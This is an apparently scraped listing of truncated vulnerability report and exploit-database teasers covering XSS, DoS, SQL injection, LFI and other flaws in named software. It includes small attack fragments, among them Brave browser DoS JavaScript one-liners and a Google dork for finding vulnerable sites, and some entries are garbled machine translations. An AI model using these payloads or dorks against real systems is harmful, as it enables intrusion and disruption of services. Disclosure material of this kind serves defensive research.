macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image

The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code tester.m can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should cras...

Razer US: Authenticated DOM-based XSS in deals.razerzone.com via the rurl parameter.

The researcher discovered that deals.razerzone.com was vulnerable to Authenticated DOM-based XSS via the rurl parameter, which could allow account hijacking via session cookies. The researcher identified the specific code snippet and provided two PoCs with different techniques. Another great repo...

Brave Software: [DOS] Browser hangs on loading the code snippet

Summary: Basically the function location.reload is causing browser to hang as browser is not able to handle multiple reloads but similar issue cannot be seen in Firefox and chrome as i am able to close the current tab. Products affected: Latest brave browser in linux. Steps To Reproduce: Use the...

Brave Software: [DOS] denial of service using code snippet on brave browser

Summary: brave browser hangs due to no validation for a code snippet causing denial of service to users. Products affected: latest brave browser in linux Steps To Reproduce: code snippet:- 1 window.location+='?\u202a\uFEFF\u202b'; OR 2 window.location+='?'+window.location.toString.split'';" Note ...

With Misfortune-Cookies-doom cookies to ROM-0 Bug patch-vulnerability warning-the black bar safety net

This article is just for fun, especially to those who like to adjust the system's embedded hack. So this is not a legitimate fix ROM-0 Bugs means fun is by one bug to fix another bug. Let's open thebeginning to find our fun. As I an article the Misfortune Cookie decryption of the write, we can be...

汇文手机图书馆不用密码获取用户信息

简要描述： 生成认证token，只用用户名即可获取用户信息 详细说明： 将用于认证的token的生成方式在客户端实现且生成方式与密码无关 影响院校列表 http://www.libsys.com.cn/huiwenappcenter2.php 漏洞证明： import java.io.UnsupportedEncodingException; import java.math.BigInteger; / Created by snail on 14-11-23. / public class LibToken public static String makeTokenString s...

CMS Made Simple 1.11.9 - Multiple Vulnerabilities

Vulnerabilities in CMS Made Simple, version 1.11.9 Discovered by Pedro Ribeiro [email protected] of Agile Information Security Reported to [email protected] and [email protected] Disclosure: 28/02/2014 / Last updated: 12/10/2014 CMS Made Simple, an open source content management...

Sun Solaris 9 RPC Request Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/21964/info The Solaris operating system is prone to a denial-of-service vulnerability. An attacker can exploit this issue to crash the 'rpcbind1M' server, denying service to legitimate users. /...

Windows XP TCP Packet Fragmentation Handling Denial of Service Vulnerability (1)

No description provided by source. source: http://www.securityfocus.com/bid/11258/info Multiple vendor implementations of the TCP stack are reported prone to a remote denial-of-service vulnerability. The issue is reported to present itself due to inefficiencies present when handling fragmented TC...

phpMyBitTorrent 2.0.4 - SQL Injection

phpMyBitTorrent 2.0.4 - SQL Injection Exploit Title: phpMyBitTorrent 2.0.4 SQL injection Google Dork: inurl:"user.php?op=register" Date: 14/FEB/2011 Author: [email protected] Software Link: http://sourceforge.net/projects/phpmybittorrent/ Version: 2.0.4 Tested on: nix...

NewsCMSlite Insecure Cookie Handling

www.BugReport.ir AmnPardaz Security Research Team Title: NewsCMSlite Vendor: http://www.katywhitton.com Bug: Insecure Cookie Handling Exploitation: Remote with browser Fix: N/A Original Advisory: http://www.bugreport.ir/index62.htm - Description: NewsCMSlite is an easy way to get regularly update...

OpenX 2.6.3 Local File Inclusion

I have found a local file inclusion exploit in OpenX 2.6.3, this is in the script "fc.php", located in /www/delivery/ Here is a snip of the code: snip includeonce '../../init-delivery.php'; $MAXPLUGINSADPLUGINNAME = 'MAXtype'; if!isset$GET$MAXPLUGINSADPLUGINNAME echo $MAXPLUGINSADPLUGINNAME . ' i...

OneCMS 2.4 Remote SQL Injection / Upload Vulnerabilities

No description provided by source. WwW.BugReport.ir AmnPardaz Security Research Team Title: OneCMS Vulnerabilities Vendor: http://www.insanevisions.com Bugs: SQL Injection Authentication bypass , Arbitrary file upload! Vulnerable Version: 2.4 prior versions also may be affected Exploitation: Remo...

RunCMS 1.6 - Local File Inclusion

RunCMS 1.6 - Local File Inclusion WwW.BugReport.ir AmnPardaz Security Research & Penetration Testing Group Title: RunCms Multiple Vulnerabilities Vendor: http://www.runcms.org/ Bugs: Local File Inclusion, Modules Authorization Weakness Vulnerable Version: RunCMS 1.6 Halloween, 1.5.x prior version...

SERV-U 6.4 provide the right method,pass to kill SERV-U version-bug warning-the black bar safety net

Modify ftpport 2 1 Modify the newdomain behind goldsun| IPas to the right of the server's IP address| Modify the newuser behind-IP=IP address the same as aboveto the right of the IP address of the server...OK..... Provide the right...will use FTP to add a can Execute command the user..... Have a...

Port interception with port hidden sniffing attacks-vulnerability warning-the black bar safety net

In WINDOWS SOCKET Server Application Programming, the following statement perhaps than than are: s=socketAFINET,SOCKSTREAM,IPPROTOTCP; saddr. sinfamily = AFINET; saddr. sinaddr. serveraddress = htonlINADDRANY; binds,SOCKADDR &saddr,sizeofsaddr; In fact, this which exists in a very big security...

Cisco VPN 3000 Concentrator <= 4.1.7, 4.7.2 (FTP) Remote Exploit

No description provided by source. / Cisco VPN Concentrator 3000 FTP remote exploit ============================================== A vulnerability exists in the Cisco VPN Concentrator 3000, an unauthenticated user may access the file system through manipulation of FTP service commands. An...

vwar150.txt

.: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | \\ /\ / :. . ..: ||| / \ \ .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: 1o.o8.2oo6 .. Affected Application: VWar query" line 64: SELECT memberid, name, lastactivity line 65: FROM...

CVE-2004-1746

Cross-site scripting XSS vulnerability in index.php in PHP Code Snippet Library allows remote attackers to inject arbitrary web script or HTML via the 1 catselect or 2 show parameters...

CVE-2004-1746

The CVE-2004-1746 entry describes a Cross-site scripting (XSS) vulnerability in PHP Code Snippet Library’s index.php, exploitable via the cat_select and show parameters. The underlying issue is inadequate input sanitization in index.php, allowing remote attackers to inject arbitrary JavaScript in...